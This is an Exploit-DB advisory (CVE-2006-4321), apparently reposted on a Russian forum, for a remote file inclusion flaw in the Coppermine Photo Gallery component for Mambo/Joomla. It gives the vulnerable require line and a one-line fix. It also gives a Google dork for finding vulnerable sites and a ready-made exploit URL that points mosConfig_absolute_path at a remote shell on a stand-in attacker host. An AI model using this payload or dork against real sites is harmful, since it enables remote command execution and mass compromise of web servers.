- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2196
- Проверка EDB
-
- Пройдено
- Автор
- K1TK4T
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-4321
- Дата публикации
- 2006-08-16
Код:
########### CopperminePhotoGallery Component ###########
Found By k1tk4t
Indonesia
This bug allows a remote atacker to execute commands via RFI
file:
cpg.php
bug:
require ($mosConfig_absolute_path."/administrator/components/com_cpg/config.cpg.php");
path:
add in cpg.php
defined( '_VALID_MOS' ) or die( 'hacking attemp.' );
dork: inurl:com_cpg
expl:
htttp:/www.site.it/components/com_cpg/cpg.php?mosConfig_absolute_path=
http://evil.xxx/shell.txt?
thanks to
e-c-h-o
h4cky0u
milw0rm
google
# milw0rm.com [2006-08-16]- Источник
- www.exploit-db.com
